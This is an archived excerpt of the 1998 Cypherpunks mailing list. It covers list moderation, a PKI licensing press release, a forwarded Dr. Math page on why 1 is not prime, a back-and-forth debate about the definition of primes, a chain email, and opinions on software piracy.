       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 04:30:38 +0800
To: cypherpunks@cyberpass.net
Subject: Cypherpunks is not a moderated list
In-Reply-To: <199811191115.DAA14438@toad.com>
Message-ID: <v0313030ab27a20e738c5@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:15 AM -0800 11/19/98, holist wrote:
>I only subscribed to this list a few weeks ago. I break my silence in
>defense of Bernardo B. Terrado, who was viciously attacked by Adam Hupp and
>then rather more graciously advised by Jim Gillogly.
>
>Having read a significant amount of material on the ideological (rather than
>the technical) background of cypherpunks (Tim May's writings, mainly) it
>seems to me rather obvious that a relative newcomer to these circles would
>come to expect to find people who may not be "mannered intellectuals", but
>who are certainly not erstwhile defenders of intellectual property,
>particularly asthe concept is applied to software today.
>
>I understand that there may be other reasons why it is unwise to post
>requests for warez on these lists, but moral outrage at the thought of
>software piracy was not one I expected to read here.

Don't confuse the views you hear from some particular person(s) to be the
collective, group views of the list, or the views of me, and so on. (This
applies to your point below about porn, too.)

>
>Especially as I hear nobody complaining about the advertisement for
>pornography that I receive every two days, regular as clockwork, from the
>cypherpunks list, not to mention the great deal of other entirely useless,
>automatically generated advertising.
>
>Unlike most of you lucky people in the States, I pay through the nose for
>on-line time.
>
>Perhaps priorities could do with rethinking.

You seem to think the Cypherpunks mailing list is some kind of moderated,
edited forum, with porn ads sent deliberately by the Governing Body of
Editors.

What goes out to the *reflector* is what comes in. Nothing more, nothing less.

You are of course free to create your own moderated, edited list.

Oh, and please learn to attach Subject names to your posts. And
"cypherpunks@toad.com" is not one of the preferred list addresses...hasn't
been for a year or two.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 20 Nov 1998 02:31:34 +0800
To: cypherpunks@cyberpass.net
Subject: [XCERT-ANNOUNCE] Network Associates Relationship (fwd)
Message-ID: <Pine.LNX.3.96.981119113340.478B-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



Thought this might be of some interest considering the current
NAI thread.

jim

---------- Forwarded message ----------
Date: Wed, 18 Nov 1998 13:13:27 -0800
From: Tim Gage <timg@xcert.com>
To: xcert-announce@xcert.com
Subject: [XCERT-ANNOUNCE] Network Associates Relationship

TO:		Xcert Friends and Partners
FROM:		Thomas Nolan, president and CEO
DATE:		November 18, 1998
RE:		Network Associates Relationship
_______________________________________

I'm pleased to report that Xcert International and Network Associates Inc.
(NAI) recently announced a technology licensing agreement where NAI will
integrate Xcert's software as the default PKI in their Net Tools Secure
product suite. This relationship will PKI enable NAI's security
offerings-including a suite of best-in-class security applications that
encompasses firewall, intrusion protection, vulnerability scanning,
encryption, authentication, anti-virus and security management. 

NAI is a company with approximately $1 Billion in revenue, 5,000 enterprise
customers, presence on 60 million desktops and 80% plus penetration into
the Global 2000. This is a significant win for Xcert and provides for joint
marketing and sales activities, including licensing of certain NAI
applications to Xcert, pre-notification of NAI product and technology
direction and, most important, the ability for Xcert to work with NAI to
sell general purpose PKI into their installed customer base..  

Xcert was selected over its competitors because of its superior technology,
principally the ability to interoperate with other vendors. NAI's
market-leading Total Network Security solution will seed Xcert's technology
into the market and will also provide NAI's customers with "hooks" to
seamlessly build Xcert's general purpose PKI infrastructure and products
into their networks.

This is a significant win for Xcert. The NAI adoption of Xcert as their
preferred PKI provider adds value to Xcert's brand recognition. This news
is yet another compelling endorsement of Xcert's products. In addition, the
ability to work with NAI's customer base provides substantial opportunity
to Xcert.  

I am sure you will share my enthusiasm for this momentous milestone on
Xcert's road to major market share.

-------------------------------------------------------------
For Immediate Release:

NETWORK ASSOCIATES TO SHIP COMPREHENSIVE PKI FROM XCERT INTERNATIONAL WITH
ALL SECURITY PRODUCT SUITES

Network Associates Customers to Receive Scalable Open-Standards Certificate
Management Integrated Into Net Tools Secure Product Line

SANTA CLARA, Calif., November 17 - Network Associates, Inc. (Nasdaq: NETA)
unveiled the next step in its integrated security strategy today by
announcing a technology partnership with Xcert International that will
bring full open-standards PKI (public key infrastructure) functionality to
all Network Associates customers as a standard feature of its integrated
security product suites. Beginning in the first quarter of 1999, all
integrated security suites from Network Associates will include the new Net
Tools PKI server, an enterprise-scaleable PKI server based on Xcert's
award-winning digital certificate management technology. 

"Network Associates has been very aggressive in driving much needed open
standards and interoperability in the security space," said Sanjay Kalra,
president of Icons, Inc., a leading nationwide PKI consulting firm. "By
working with Xcert to include a complete standards-based PKI in all of
their security application suites at no extra charge, Network Associates is
making things like universal client VPNs and active response firewalls a
reality for customers of all sizes. This announcement is the perfect
follow-up to their previous PKI partnerships with VeriSign and Entrust."

As a result of this partnership, Network Associates customers will be able
to broadly deploy integrated security solutions that interoperate through
secure and authenticated channels. With this announcement, Network
Associates becomes the first vendor to enable secure, scaleable integration
between individual security applications by providing flexible PKI
functionality out of the box and universally supporting existing PKI
solutions like those from partners like VeriSign (Nasdaq: VRSN), Entrust
Technologies (Nasdaq: ENTU) and Xcert.  Network Associates customers will
be licensed to use the new Net Tools PKI with any Network Associates
application. 

Under the terms of the agreement, Network Associates will integrate Xcert's
award-winning PKI technology into its Net Tools Secure product line, a
suite of best-in-class security applications spanning firewall, intrusion
protection, vulnerability scanning, encryption, authentication, anti-virus,
and security management. Xcert's flexible open architecture has received
multiple industry accolades this year, including a recent Editor's Choice
selection from Network Computing that praised Xcert's technology as the
"best strategic choice for PKI in the enterprise." Xcert's technology was
selected by Network Associates because of its broad support of all industry
PKI standards, including x.509, PGP, LDAP, and PKCS #7, 10, and 11.

"Network Associates is committed to promoting broad interoperability and
open standards in the security industry," said Peter Watkins, general
manager of the Net Tools Secure division at Network Associates. "This
agreement makes it even easier for our customers to deploy scaleable,
standards-based, security applications that work together in concert to
actively respond to changing security threats."

"This technology license agreement expands Network Associates'
best-of-breed security offerings to include the industrial-strength PKI
necessary for conducting business-to-business electronic commerce and
communications," said Thomas Nolan, President and CEO of Xcert
International. "Network Associates customers will be able to broadly deploy
distributed security applications, regardless of whether or not they have a
general PKI solution. Because Xcert's technology supports all certificate
standards, Network Associates customers will also be able to interact
seamlessly with business partners who have disparate PKI solutions in use."

While other security application vendors have recently discussed plans to
integrate their products, none have addressed universal PKI support, an
essential element to making integrated security a secure and scaleable
reality for enterprise customers. As a result of this agreement, Network
Associates customers will be able to broadly deploy distributed security
applications such as remote VPN and client-side encryption across large
user populations. The new Net Tools PKI will also support more robust
certificate management for authenticated communications between integrated
Network Associates security applications. Through a concept known as
"Active Security", Network Associates is enabling its security products to
operate in concert, actively communicating events between applications and
adapting security policies of these applications for real-time active
response when critical security threats are detected. 

With headquarters in Santa Clara, California, Network Associates, Inc. is a
leading supplier of enterprise network security and management software.
Network Associates' Net Tools Secure and Net Tools Manager offer
best-of-breed, suite-based network security and management solutions. Net
Tools Secure and Net Tools Manager suites combine to create Net Tools,
which centralizes these point solutions within an easy-to-use integrated
systems management environment. For more information, Network Associates
can be reached at (408) 988-3832 or on the Internet at http://www.nai.com.

Based in Walnut Creek, California, Xcert International Inc. is the premier
developer of Public Key Infrastructure technology. Xcert's products provide
privacy and authenticity for conducting secure Internet business
transactions. Xcert develops, manufactures and distributes Certificate
Authority and public key infrastructure solutions that use secure directory
services to provide organizations and individuals with a ubiquitous and
secure method of communicating with each other over the Internet. Xcert
also licenses its underlying PKI technology to selected service providers
and third party developers worldwide. Xcert can be reached on the World
Wide Web at http://www.xcert.com. 

FOR MORE INFORMATION:

Ruby Qurashi, Tim Gage
Xcert International Inc.
925-274-9300 Ext .108
rubyq@xcert.com / timg@xcert.com

----------------------------------------------------------------------
XCERT-ANNOUNCE: Xcert Software Announcements Mailing List
to remove yourself from this mailing list, please send mail containing
"unsubscribe xcert-announce" in the body to majordomo@xcert.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <jchoate@dev.tivoli.com>
Date: Fri, 20 Nov 1998 02:59:25 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Math Forum - Ask Dr. Math
Message-ID: <36545A6A.85BCB07A@dev.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain

http://forum.swarthmore.edu/dr.math/problems/1isprime.html
-- 


    
--------------------------------------------------------------------
            The end of our exploring will be to arrive at where we
            started, and to know the place for the first time.

                                                 T.S. Eliot
                                    
            Tivoli Systems                       James F. Choate
            9442 Capital of Texas Hwy. N.        512-436-1062
            Austin, Tx. 78759                    jchoate@tivoli.com
    
--------------------------------------------------------------------
Title: Math Forum - Ask Dr. Math




<IMG SRC="http://forum.swarthmore.edu/dr.math/dr.mathQA.gif" ALT="Ask Dr. Math - Questions and
Answers from our Archives">



Back to About Numbers ||

All Levels ||

Search Dr. Math






Why is 1 Not Considered Prime?


Date: 20 Mar 1995 12:22:37 -0500
From: ioostind@cln.etc.bc.ca (Ian Oostindie)
Subject: Why 1 is prime

        My friend, Roger Gillies told me he received some 
useful math information from you and gave me your e-mail 
address.  I thought of you when a grade six student stumped 
me with a classic.  Well, at least a classic in my mind.

        Just recently a grade six student asked me "Why is 1 
not considered prime?"  I tried to answer but as usual 
could not since I do not understand this either.  I thought 
it may lie in the fact that "we" don't use the true definition 
or we are interpreting it wrong.  A prime is normally 
described as a number that can be expressed by only one and 
itself.  We exclude all non-natural numbers from the set that 
we will be working on and then everything is fine except for 
when we work with 1.

        1 = 1 x 1.  That is, one equals 1 times itself and there 
is no other combination.

        Now to the grade six student in Faro Yukon, I said 
there may be a small print clause in the contract with the 
math gods that says you can only write it once since 1 also 
equals 1x1x1x1x...   This would not work for other primes 
such as two: 2 does not equal 1x2x2x2x...  Likewise, 3 does 
not equal 1x3x3x3x...

        Patterns are very important to mathematics, I further 
explained, and this is a pattern I see being broken.  I showed 
this in a slightly different way to the grade sixer but in 
essence the same.

        My question to you, Dr. Math, is what is the small print 
in the contract with the Math gods and how do we explain it 
to the grade six kids that are supposed to know it?

        Thank you very much for any consideration you make.






Date: 25 Mar 1995 16:21:45 -0500
From: Dr. Ken
Subject: Re: Why 1 is prime

Hello there!

Yes, you're definitely on the right track.  In fact, it's precisely 
because of "patterns that mathematicians don't like to break" 
that 1 is not defined as a prime.  Perhaps you have seen the 
theorem (even if you haven't, I'm sure you know it intuitively) 
that any positive integer has a unique factorization into primes.  
For instance, 4896 = 2^5 * 3^2 * 17, and this is the only possible 
way to factor 4896.  But what if we allow 1 in our list of prime 
factors?  Well, then we'd also get 1 * 2^5 * 3^2 * 17, and 
1^75 * 2^5 * 3^2 * 17, and so on.  So really, the flavor of the 
theorem is true only if you don't allow 1 in there.

So why didn't we just say something like "a prime factorization
is a factorization in which there are no factors of 1" or 
something?  Well, it turns out that if you look at some more 
number theory and you accept 1 as a prime number, you'd have 
all kinds of theorems that say things like "This is true for all 
prime numbers except 1" and stuff like that.  So rather than 
always having to exclude 1 every time we use prime numbers, 
we just say that 1 isn't prime, end of story.

Incidentally, if you want to call 1 something, here's what it is: 
it's called a "unit" in the integers (as is -1).  What that means is 
that if we completely restrict ourselves to the integers, we use 
the word "unit" for the numbers that have reciprocals (numbers 
that you can multiply by to get 1).  For instance, 2 isn't a unit, 
because you can't multiply it by anything else (remember, 1/2 
isn't in our universe right now) and get 1.  This is how we 
think about things in Abstract Algebra, something sixth graders 
won't need to worry about for a long time, but I thought I'd 
mention it.

-Ken "Dr." Math





Submit your own
question to Dr. Math



<IMG SRC="http://forum.swarthmore.edu/forum.blueline.gif"
ALT="_____________________________________">

Math Forum Home  ||

The Collection ||

Quick Reference ||

Math Forum Search



<IMG SRC="http://forum.swarthmore.edu/forum.blueline.gif"
ALT="_____________________________________">

Ask Dr. Math
(c) 1994-1998 The Math Forum







This page was created by the Forum SmartPage suite of web tools.
Sun Nov 15 23:38:44 1998





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Nov 1998 01:57:01 +0800
To: jim@acm.org
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers
In-Reply-To: <365448AE.D504F2D6@acm.org>
Message-ID: <365452E2.CE92ED6A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly wrote:
> 
> Ray Arachelian wrote:
> > "Igor Chudov @ home" wrote:
> 
> > > Well, take 11, for example, it cannot be repsesented as a sum of different
> > > primes. It cannot, pure and simple.
> 
> > Bullshit: 7+5+(-1)=11.  Last I heard, negative numbers weren't excluded from
> > being primes.  7 is different from 5, -1 is different from 7 and from 5.
> 
> If this is boiling down to a definition of primes, I'll haul out my Hardy &
> Wright, page 2:
> 
>     A number p is said to be prime if (i) p > 1, (ii) p has no positive
>     divisors except 1 and p.  ...  It is important to observe that 1 is not
>     reckoned as a prime.
> 
> My number theory class at college (admittedly that was three decades ago)
> also started the prime series at 2 and went up from there.  The term
> "odd primes" always meant 3 and above, not 1 and above.

Well, I suppose negative numbers can't be included because 1 can't be included:
1*1*1*1=1 and the idea is that a prime can only have itself and 1 as factors,
where 1 can be factored by itself over and over to an infinite number of 1's,
and by that definition you can exclude -1 since -1=(-1*1*-1*1), and so if
we take -5 and factor it to -5 and 1 it's good, but it can also be factored
to -1 and 5.  IMHO 1 and -1 being shunned in this way is a bit silly, but
whatever... :^)  (Same applies to zero since 0=0*0*0*0*0, but zero has the
built in difference of that it can't be divided by itself at all.)

So I guess I have to take back 7+5+(-1) and go with Jim's 1+3+7, but fuck,
that won't work either since 1 isn't a prime...  So I guess Igor is right on
this one.  Sorry Jim... 

Any other ideas on 11?


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 03:10:28 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Math Forum - Ask Dr. Math (fwd)
Message-ID: <199811191827.MAA04861@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 19 Nov 1998 11:50:34 -0600
> Subject: Math Forum - Ask Dr. Math

> http://forum.swarthmore.edu/dr.math/problems/1isprime.html

> <META NAME="title" CONTENT="Why is 1 Not Considered Prime?">

> math gods that says you can only write it once since 1 also 
> equals 1x1x1x1x...   This would not work for other primes 
> such as two: 2 does not equal 1x2x2x2x...  Likewise, 3 does 
> not equal 1x3x3x3x...

Whether the 1 is there or not is irrelevant,

3x3x3x3... is not 3 in the first place.

3x1x1x1x1.... IS 3.

>         Patterns are very important to mathematics, I further 
> explained, and this is a pattern I see being broken.

> Date: 25 Mar 1995 16:21:45 -0500
> From: Dr. Ken
> Subject: Re: Why 1 is prime

> Yes, you're definitely on the right track.  In fact, it's precisely 
> because of "patterns that mathematicians don't like to break" 
> that 1 is not defined as a prime.  Perhaps you have seen the 
> theorem (even if you haven't, I'm sure you know it intuitively) 
> that any positive integer has a unique factorization into primes.  
> For instance, 4896 = 2^5 * 3^2 * 17, and this is the only possible 
> way to factor 4896.  But what if we allow 1 in our list of prime 
> factors?  Well, then we'd also get 1 * 2^5 * 3^2 * 17, and 
> 1^75 * 2^5 * 3^2 * 17, and so on.  So really, the flavor of the 
> theorem is true only if you don't allow 1 in there.

This definition of a prime has one serious drawback.

It ignores the fundamental identity theorem of arithmatic:

 1 * n = n

So, as a result we're in the interesting and potentialy untenable
situation of defining a identity theorem, base our math on it, and then
come along one day and say it doesn't apply anymore WITHOUT making any
other changes to the structure of the theories....

This is VERY BAD science/math.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Fri, 20 Nov 1998 05:08:27 +0800
To: "Albert P. Franco, II" <apf2@apf2.com>
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811132049.OAA05427@manifold.algebra.com>
Message-ID: <v04003a02b27a2f9a0161@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>Nobody that has been on this list very long could have been duped...We all
>know that some group of MIB types would have swooped down on the guy, and
>he would have been just another heart attack statistic...

I raised a similar thread last year. I caused quite a bit of comment. Since
then I've discussed the possibility of employing a common yeast or other
organism to allow individuals to create their own home pharmacies with
friends and acquintances in this sector. Their opinions vary but all
assured me that desktop genetic engineering and production capabilities are
likely no more than 10 years away and that fed measures to prevent this
will likely be singularly ineffective.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 03:12:33 +0800
To: ace@EINSTEIN.ssz.com (Advanced Computer Experimentation)
Subject: Anyone know where to get EURISKO?
Message-ID: <199811191834.MAA05016@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Anyone got a clue on where to get a copy of EURISKO (language isn't
important since I want to convert it to Perl)?

I'm playing with some number theory stuff and since EURISKO was pretty good
at I'd be interested in seein the specifics of Lenet's approach. All I've
been able to find so far are very general descriptions in the various AI
sites.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Nov 1998 02:17:24 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers (fwd)
In-Reply-To: <199811191722.LAA04172@einstein.ssz.com>
Message-ID: <365456C4.5D18C1C6@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Thu, 19 Nov 1998 12:18:26 -0500
> > From: Ray Arachelian <sunder@brainlink.com>
> > Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers
> 
> > So I guess I have to take back 7+5+(-1) and go with Jim's 1+3+7, but fuck,
> > that won't work either since 1 isn't a prime...  So I guess Igor is right on
> > this one.  Sorry Jim...
> 
> A prime is defined as *ANY* number (note the definition doesn't mention
> sign or magnitude nor does it exclude any numbers a priori) that has no
> multiplicative factors other than itself and 1.
> 
> 1 * 1 = 1 so it is clearly prime.
> 
> Now, if a particular branch of number theory wants to extend it and make it
> only numbers >=2 that is fine, I'm not working in that branch anyway.

Actually the issue is 1=1*1, 1=1*1*1 ... 1=1^n.  If 1 is prime, then -1 must
be prime since -1=1^n where n is odd and 1=1^n where any n is used.  The fact
that 1 can be factored from itself recursively is the issue.

(If the above weren't true, then -1 could be prime without affecting whether
-3's lack of primality: -3=-1*3 and -3=1*-3.)

(See: http://forum.swarthmore.edu/dr.math/problems/1isprime.html )


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethena@usa.net
Date: Fri, 20 Nov 1998 04:45:56 +0800
To: czareena@hotmail.com
Subject: Fwd: Re: Snowball fight '98 - '99
Message-ID: <19981119194241.6558.qmail@www0r.netaddress.usa.net>
MIME-Version: 1.0
Content-Type: text/plain




  > GOTCHA!!! 
  > > \ | / 
  > > \\ \ | | / // 
  > > \\\ \\ // /// 
  > > \\\ ####### /// 
  > > \\## ##// 
  > > -- ## ## -- 
  > > -- ## squish!! ## -- 
  > > //## ##\\ 
  > > // ### ### \\ 
  > > /// ####### \\\ 
  > > /// // \\ \\\ 
  > > // / | | \ \\ 
  > > / | \ 
  > > 
  > > You have just been hit with a snow ball! 
  > > > It's the start of..... 
  > > Snow Ball Fight '98/'99!!!! 
  > > 
  > > One rule to this game.... 
  > > You can't hit someone who has already hit you! 
  > > Now...go out there and hit as many people 
  > > as you can before they get you!! 
  > 

____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tony" <jacket9@primenet.com>
Date: Fri, 20 Nov 1998 04:47:28 +0800
To: <imran3@cheerful.com>
Subject: Fw:  Fwd: Re: Snowball fight '98 - '99
Message-ID: <000401be13f5$20be24c0$71505089@wynnd.hqisec.army.mil>
MIME-Version: 1.0
Content-Type: text/plain



>  > GOTCHA!!! 
>  > > \ | / 
>  > > \\ \ | | / // 
>  > > \\\ \\ // /// 
>  > > \\\ ####### /// 
>  > > \\## ##// 
>  > > -- ## ## -- 
>  > > -- ## squish!! ## -- 
>  > > //## ##\\ 
>  > > // ### ### \\ 
>  > > /// ####### \\\ 
>  > > /// // \\ \\\ 
>  > > // / | | \ \\ 
>  > > / | \ 
>  > > 
>  > > You have just been hit with a snow ball! 
>  > > > It's the start of..... 
>  > > Snow Ball Fight '98/'99!!!! 
>  > > 
>  > > One rule to this game.... 
>  > > You can't hit someone who has already hit you! 
>  > > Now...go out there and hit as many people 
>  > > as you can before they get you!! 
>  > 
>
>____________________________________________________________________
>Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Nov 1998 02:16:43 +0800
To: Ray Arachelian <cypherpunks@einstein.ssz.com
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers (fwd)
In-Reply-To: <199811191722.LAA04172@einstein.ssz.com>
Message-ID: <36545A30.EFE1ABCF@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian wrote:

> Actually the issue is 1=1*1, 1=1*1*1 ... 1=1^n.  If 1 is prime, then -1 must
> be prime since -1=1^n where n is odd and 1=1^n where any n is used.  The fact
> that 1 can be factored from itself recursively is the issue.

Duh! I must not have had enough caffeine this morning.  Above should 
say -1=-1^n where N is odd.
 

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@idsi.net
Date: Fri, 20 Nov 1998 03:21:34 +0800
To: holist <holist@mail.matav.hu>
Subject: Re: your mail
In-Reply-To: <199811191115.DAA14438@toad.com>
Message-ID: <Pine.LNX.3.96.981119131702.24786A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Nov 1998, holist wrote:

> I understand that there may be other reasons why it is unwise to post
> requests for warez on these lists, but moral outrage at the thought of
> software piracy was not one I expected to read here.

I for one am not a tremendous fan of copyright as applied to software
today. I support the theory .. as a programmer I can appreciate the
effort that goes into software development and I don't wish to see
such developers harmed by piracy. 

OTOH, the consumer has a vested interest in sampling software before he
pays for it. I wouldn't buy a car if I wasn't allowed to test drive it
first. If someone offered me a car that I could not test drive, and
that I could not return if it is defective, I certainly wouldn't buy
the thing. As a consumer it is a bad move, though it certainly helps
the car manufacturers (they can make a defective product with no worries).

A prime example of this is Win98 .. a friend of mine was running win95 
happily and smoothly (well, as smooth as win95 gets). He upgraded to 98.
It crashed several times during the install procedure, and make his
win95 set up unusable in the process. 

He can't return his win98 upgrade and get his money back (due to
copyright), and he wasn't allowed to test it all out before spending
the cash. In a word, he is screwed.

We can't ignore the programmer's need to get paid and we can't ignore
the consumer's need to a fair shake.

We need to find a common ground.

Now, for small $40 word processors, a sampling system is probably not
worth the trouble. But for expensive or important packages (like OS's)
sampling the software first is a good thing. 

> Especially as I hear nobody complaining about the advertisement for
> pornography that I receive every two days, regular as clockwork, from the
> cypherpunks list, not to mention the great deal of other entirely useless,
> automatically generated advertising.

That is spam. Cypherpunks is an open list (any messages sent in are 
distributed freely). 

Why not find a nice free web-based email service with mail filtering?
Filter the porn out before you even get the mail forwarded to your,
or before you read it over the web or POP or whatever.

Michael J. Graffam (mgraffam@idsi.net)
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Fri, 20 Nov 1998 07:32:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: learn computer forensics with the boys from the US Treasury
In-Reply-To: <199811191740.SAA22354@replay.com>
Message-ID: <v04003a03b27a41cd47fa@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



I see that the Mac and various Unix varients are not well represented in
these courses...

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 04:32:55 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd (fwd)
In-Reply-To: <199811191719.LAB04034@einstein.ssz.com>
Message-ID: <199811191948.NAA07880@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> Forwarded message:
> 
> > Subject: Re: Goldbach's Conjecture - a question about prime sums of odd
> > Date: Thu, 19 Nov 1998 10:53:50 -0600 (CST)
> > From: ichudov@Algebra.Com (Igor Chudov @ home)
> 
> > I have no idea where you heard it, but primes are numbers greater than 1,
> > by definition.
> 
> Actualy a prime is any number which has no multiplicitave factors other than
> itself and 1.
> 
> Does that mean negatives can't be prime numbers?
> 
> So, -3 breaks down to:
> 
> -3 * 1 = -3; 3 * -1 would be another set of factors so negatives can't be
> primes in the strictest sense.

Negatives are not primes by definition.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 04:41:00 +0800
To: sunder@brainlink.com (Ray Arachelian)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers
In-Reply-To: <365456C4.5D18C1C6@brainlink.com>
Message-ID: <199811191950.NAA07904@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Ray Arachelian wrote:
> Jim Choate wrote:
> > Forwarded message:
> > > Date: Thu, 19 Nov 1998 12:18:26 -0500
> > > From: Ray Arachelian <sunder@brainlink.com>
> > > Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers
> > 
> > > So I guess I have to take back 7+5+(-1) and go with Jim's 1+3+7, but fuck,
> > > that won't work either since 1 isn't a prime...  So I guess Igor is right on
> > > this one.  Sorry Jim...
> > 
> > A prime is defined as *ANY* number (note the definition doesn't mention
> > sign or magnitude nor does it exclude any numbers a priori) that has no
> > multiplicative factors other than itself and 1.
> > 
> > 1 * 1 = 1 so it is clearly prime.
> > 
> > Now, if a particular branch of number theory wants to extend it and make it
> > only numbers >=2 that is fine, I'm not working in that branch anyway.
> 
> Actually the issue is 1=1*1, 1=1*1*1 ... 1=1^n.  If 1 is prime, then -1 must
> be prime since -1=1^n where n is odd and 1=1^n where any n is used.  The fact
> that 1 can be factored from itself recursively is the issue.

People, please open ANY math book and see the definition for yourselves.

1 is not a prime by definition. Not because of any other reason.

Besides, -1=1^n is just not true for any n.

igor

> (If the above weren't true, then -1 could be prime without affecting whether
> -3's lack of primality: -3=-1*3 and -3=1*-3.)
> 
> (See: http://forum.swarthmore.edu/dr.math/problems/1isprime.html )
> 
> 
> -- 
> 
> =====================================Kaos=Keraunos=Kybernetos==============
> .+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
> ..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
> <--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
> ../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
> .+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
> ======================= http://www.sundernet.com ==========================
> 



	- Igor.




